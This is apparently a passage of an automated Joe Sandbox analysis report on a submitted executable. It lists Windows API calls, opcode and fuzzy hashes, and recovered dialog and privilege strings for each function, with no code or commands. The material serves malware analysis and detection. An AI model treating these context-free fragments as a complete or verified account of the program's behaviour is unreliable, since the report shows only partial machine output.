                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectRelease
                                                                                        • String ID: -7$77
                                                                                        • API String ID: 1429681911-1903741993
                                                                                        • Opcode ID: e9a28d38778e3459e8e98041ff15b2ef503305afd8fbebc4e3a716ca3f8b91df
                                                                                        • Instruction ID: ea53bf1250d3ec79fab6327fb7ed571e237db98eccecb7e37b4017c5efd6d953
                                                                                        • Opcode Fuzzy Hash: e9a28d38778e3459e8e98041ff15b2ef503305afd8fbebc4e3a716ca3f8b91df
                                                                                        • Instruction Fuzzy Hash: 3C21E7B2148314AFD302AFA5DC48E6FBBFDFF89351F044819FA46D2120D631AA548B62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 0036B9B8
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0036B9D6
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0036B9E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                        • String ID: %c:\
                                                                                        • API String ID: 525462905-3142399695
                                                                                        • Opcode ID: cb2328ac369e33b2589c0490b847e92d86c4ba3085cf33766d49fe83e827490f
                                                                                        • Instruction ID: 9d58c613aa123bef1580ceffecf3f80cf3bb0a74bd8e7ea492f703a3d719e8dc
                                                                                        • Opcode Fuzzy Hash: cb2328ac369e33b2589c0490b847e92d86c4ba3085cf33766d49fe83e827490f
                                                                                        • Instruction Fuzzy Hash: E901F56350431169DA327B75CC46D6BE7ECEE92770B40C80AF544DA086EB20D880C7B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037B2BE
                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0037B2D6
                                                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 0037B304
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: GETPASSWORD1$xz;
                                                                                        • API String ID: 445417207-2733714143
                                                                                        • Opcode ID: c5e05b726ddd47977b9a4f4bc4087ea411143576ea19b401430dbe0486a190be
                                                                                        • Instruction ID: aaca5da2ead4615f1e82f3310eee6081177a73f72f05bc1357f94e1f6d03fa39
                                                                                        • Opcode Fuzzy Hash: c5e05b726ddd47977b9a4f4bc4087ea411143576ea19b401430dbe0486a190be
                                                                                        • Instruction Fuzzy Hash: C8110836900118BADB339A649C49FFFB77CEF09704F108420FA49F6580D7A8A9418771
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadBitmapW.USER32(00000065), ref: 0037B6ED
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0037B712
                                                                                        • DeleteObject.GDI32(00000000), ref: 0037B744
                                                                                        • DeleteObject.GDI32(00000000), ref: 0037B767
                                                                                          • Part of subcall function 0037A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0037B73D,00000066), ref: 0037A6D5
                                                                                          • Part of subcall function 0037A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A6EC
                                                                                          • Part of subcall function 0037A6C2: LoadResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A703
                                                                                          • Part of subcall function 0037A6C2: LockResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A712
                                                                                          • Part of subcall function 0037A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A72D
                                                                                          • Part of subcall function 0037A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A73E
                                                                                          • Part of subcall function 0037A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037A7A7
                                                                                          • Part of subcall function 0037A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0037A7C6
                                                                                          • Part of subcall function 0037A6C2: GlobalFree.KERNEL32(00000000), ref: 0037A7CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                        • String ID: ]
                                                                                        • API String ID: 1428510222-3352871620
                                                                                        • Opcode ID: 549f191ce5fb60ed2a9792c0ec0dbf2ca3a403bb7d018b1fd711f4e938ffda67
                                                                                        • Instruction ID: 7a7a3df8906a998b67ae55fb60b60262799672eaf4262e6c4021dd0291dd2517
                                                                                        • Opcode Fuzzy Hash: 549f191ce5fb60ed2a9792c0ec0dbf2ca3a403bb7d018b1fd711f4e938ffda67
                                                                                        • Instruction Fuzzy Hash: BD01D63650061567C73377745C09F7FBABE9FC1752F058015F948EB291DF298D055262
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037D64B
                                                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0037D661
                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0037D675
                                                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 0037D684
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: RENAMEDLG
                                                                                        • API String ID: 445417207-3299779563
                                                                                        • Opcode ID: 77177dd0745cc5f97dce611145660a38449693f4d314a17bb79dc8fda1099f9a
                                                                                        • Instruction ID: 26f95472457fc859ab6fd3e617bdf89ba183339bd339c2489b084fa1ba18f480
                                                                                        • Opcode Fuzzy Hash: 77177dd0745cc5f97dce611145660a38449693f4d314a17bb79dc8fda1099f9a
                                                                                        • Instruction Fuzzy Hash: 21012833284214BED2335F649E09F577B7CEF5AB05F528110F30AA20D1C7A6AA04D775
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00387E24,?,?,00387DC4,?,0039C300,0000000C,00387F1B,?,00000002), ref: 00387E93
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00387EA6
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00387E24,?,?,00387DC4,?,0039C300,0000000C,00387F1B,?,00000002,00000000), ref: 00387EC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 51365cbb093e2d6a4a4e89ff9f7c4a8c6777e934877558b71a94cd9eaa35a1d2
                                                                                        • Instruction ID: 7eb14ccea3bca64735d86088b063b4e1905a37e659de7895792277ed6dd0a381
                                                                                        • Opcode Fuzzy Hash: 51365cbb093e2d6a4a4e89ff9f7c4a8c6777e934877558b71a94cd9eaa35a1d2
                                                                                        • Instruction Fuzzy Hash: 4FF06871905208BBDB139FA5DC09BDEBFB9EF44711F1140AAF805A2250DB369E40CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                          • Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0036F2E4
                                                                                        • GetProcAddress.KERNEL32(003A81C8,CryptUnprotectMemory), ref: 0036F2F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                        • API String ID: 2141747552-1753850145
                                                                                        • Opcode ID: 5798e71cf246aca09ccf341690c944b8d0a4d6ae59af9e6bfda00cf2d240b91b
                                                                                        • Instruction ID: daa69d6c08429cdd73b4cd569cb064c86be681b67bea8b42274026684d3e31b0
                                                                                        • Opcode Fuzzy Hash: 5798e71cf246aca09ccf341690c944b8d0a4d6ae59af9e6bfda00cf2d240b91b
                                                                                        • Instruction Fuzzy Hash: 51E046B4950742AEDB239B38A849B82BAD86F04714F14C82EE0DAA3750DAB5D9808B50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustPointer$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 2252061734-0
                                                                                        • Opcode ID: 4edecec2acea8cd81a133d5b938e566a24d282526b8370242dd9dac8237af72d
                                                                                        • Instruction ID: 3b66058a598dc26359ee8f061d45583c1248038ad394f034436094c91f550bdb
                                                                                        • Opcode Fuzzy Hash: 4edecec2acea8cd81a133d5b938e566a24d282526b8370242dd9dac8237af72d
                                                                                        • Instruction Fuzzy Hash: 5551CF71600312AFDB2BAF14D845BBBB7B4BF54310F2545AAEC124B6A1E731AD44D790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0038BF39
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038BF5C
                                                                                          • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038BF82
                                                                                        • _free.LIBCMT ref: 0038BF95
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038BFA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 336800556-0
                                                                                        • Opcode ID: 0eb4aaf83f7348e5acec297865699de0bbdf29a5c2a00933275ee3f58f2d9860
                                                                                        • Instruction ID: aa546c02a6206b82010c38a5808e7e187247a32b1a51df217a23ef8a7d333074
                                                                                        • Opcode Fuzzy Hash: 0eb4aaf83f7348e5acec297865699de0bbdf29a5c2a00933275ee3f58f2d9860
                                                                                        • Instruction Fuzzy Hash: D401D8B66013127F632336B65C8CC7BEB6DDEC2B903150199FA04C6211EF618D0186B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,?,003891AD,0038B188,?,00389813,00000001,00000364,?,003840EF,?,?,003A1098), ref: 0038986E
                                                                                        • _free.LIBCMT ref: 003898A3
                                                                                        • _free.LIBCMT ref: 003898CA
                                                                                        • SetLastError.KERNEL32(00000000,?,003A1098), ref: 003898D7
                                                                                        • SetLastError.KERNEL32(00000000,?,003A1098), ref: 003898E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        • Opcode ID: 00a1050f19f7835118482262c96ba0370230881efb18dc7e2ca970cbf8d1e407
                                                                                        • Instruction ID: 5103ba57c9c7776e769bd194c278ddae35c715f96dda6e2da60edb2e5a95b2f0
                                                                                        • Opcode Fuzzy Hash: 00a1050f19f7835118482262c96ba0370230881efb18dc7e2ca970cbf8d1e407
                                                                                        • Instruction Fuzzy Hash: 8F01F4371447036BD31377646C85B7B256EDBD2770B3A05B7F515A6292EE318D029322
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 003711CF: ResetEvent.KERNEL32(?), ref: 003711E1
                                                                                          • Part of subcall function 003711CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 003711F5
                                                                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00370F21
                                                                                        • CloseHandle.KERNEL32(?,?), ref: 00370F3B
                                                                                        • DeleteCriticalSection.KERNEL32(?), ref: 00370F54
                                                                                        • CloseHandle.KERNEL32(?), ref: 00370F60
                                                                                        • CloseHandle.KERNEL32(?), ref: 00370F6C
                                                                                          • Part of subcall function 00370FE4: WaitForSingleObject.KERNEL32(?,000000FF,00371101,?,?,0037117F,?,?,?,?,?,00371169), ref: 00370FEA
                                                                                          • Part of subcall function 00370FE4: GetLastError.KERNEL32(?,?,0037117F,?,?,?,?,?,00371169), ref: 00370FF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 1868215902-0
                                                                                        • Opcode ID: 5b7a6289f6356d1a32747eeca9d9fa5474b81e03151852c1217bfb5452b11ab9
                                                                                        • Instruction ID: 2540cb79de1d536b33339be99f21791785d6b2a5ca31c59d679d19df51c4339d
                                                                                        • Opcode Fuzzy Hash: 5b7a6289f6356d1a32747eeca9d9fa5474b81e03151852c1217bfb5452b11ab9
                                                                                        • Instruction Fuzzy Hash: 070152B2100744EFC7339B64DC85BC6FBADFB08710F00492AF16B52160C7767A44CA50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 0038C817
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 0038C829
                                                                                        • _free.LIBCMT ref: 0038C83B
                                                                                        • _free.LIBCMT ref: 0038C84D
                                                                                        • _free.LIBCMT ref: 0038C85F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 6ed10f187f01be4ab5677fb4ae8cd6daaa5a7db49ed91751090b98e11f3bb022
                                                                                        • Instruction ID: 46e246b9cff99683a1bcdb29ba8f61ddc732b224907f67ebed3d41024a568e75
                                                                                        • Opcode Fuzzy Hash: 6ed10f187f01be4ab5677fb4ae8cd6daaa5a7db49ed91751090b98e11f3bb022
                                                                                        • Instruction Fuzzy Hash: EAF01232954344ABC623FB68E485C1673EEAB00714B95289AF108DB652CB71FC80CB64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00371FE5
                                                                                        • _wcslen.LIBCMT ref: 00371FF6
                                                                                        • _wcslen.LIBCMT ref: 00372006
                                                                                        • _wcslen.LIBCMT ref: 00372014
                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036B371,?,?,00000000,?,?,?), ref: 0037202F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CompareString
                                                                                        • String ID:
                                                                                        • API String ID: 3397213944-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _swprintf
                                                                                        • String ID: %ls$%s: %s
                                                                                        • API String ID: 589789837-2259941744
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\CJF0Ri1HrG.exe,00000104), ref: 00387FAE
                                                                                        • _free.LIBCMT ref: 00388079
                                                                                        • _free.LIBCMT ref: 00388083
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                        • API String ID: 2506810119-1541805510
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 003831FB
                                                                                        • _abort.LIBCMT ref: 00383306
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: EncodePointer_abort
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 948111806-2084237596
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00367406
                                                                                          • Part of subcall function 00363BBA: __EH_prolog.LIBCMT ref: 00363BBF
                                                                                        • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 003674CD
                                                                                          • Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
                                                                                          • Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
                                                                                          • Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                        • API String ID: 3813983858-639343689
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037AD98
                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0037ADAD
                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0037ADC2
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ItemText$DialogWindow
                                                                                        • String ID: ASKNEXTVOL
                                                                                        • API String ID: 445417207-3402441367
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DialogBoxParamW.USER32(GETPASSWORD1,00010420,0037B270,?,?), ref: 0037DE18
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DialogParam
                                                                                        • String ID: GETPASSWORD1$r7$xz;
                                                                                        • API String ID: 665744214-399909694
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __fprintf_l.LIBCMT ref: 0036D954
                                                                                        • _strncpy.LIBCMT ref: 0036D99A
                                                                                          • Part of subcall function 00371DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,003A1030,?,0036D928,00000000,?,00000050,003A1030), ref: 00371DC4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                        • String ID: $%s$@%s
                                                                                        • API String ID: 562999700-834177443
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E85
                                                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E8F
                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E9F
                                                                                        Strings
                                                                                        • Thread pool initialization failed., xrefs: 00370EB7
                                                                                        Similarity
                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                        • String ID: Thread pool initialization failed.
                                                                                        • API String ID: 3340455307-2182114853
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Malloc
                                                                                        • String ID: (7$27$A
                                                                                        • API String ID: 2696272793-678002403
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                        • API String ID: 0-56093855
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0036E2E8: _swprintf.LIBCMT ref: 0036E30E
                                                                                          • Part of subcall function 0036E2E8: _strlen.LIBCMT ref: 0036E32F
                                                                                          • Part of subcall function 0036E2E8: SetDlgItemTextW.USER32(?,0039E274,?), ref: 0036E38F
                                                                                          • Part of subcall function 0036E2E8: GetWindowRect.USER32(?,?), ref: 0036E3C9
                                                                                          • Part of subcall function 0036E2E8: GetClientRect.USER32(?,?), ref: 0036E3D5
                                                                                        • GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                        • SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                        • String ID: 7$0
                                                                                        • API String ID: 2622349952-1435763450
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: __alldvrm$_strrchr
                                                                                        • String ID:
                                                                                        • API String ID: 1036877536-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00367F69,?,?,?), ref: 0036A3FA
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00367F69,?), ref: 0036A43E
                                                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00367F69,?,?,?,?,?,?,?), ref: 0036A4BF
                                                                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,00367F69,?,?,?,?,?,?,?,?,?,?), ref: 0036A4C6
                                                                                        Similarity
                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 2287278272-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,003847C6,00000000,00000000,003857FB,?,003857FB,?,00000001,003847C6,2DE85006,00000001,003857FB,003857FB), ref: 0038C9D5
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0038CA5E
                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0038CA70
                                                                                        • __freea.LIBCMT ref: 0038CA79
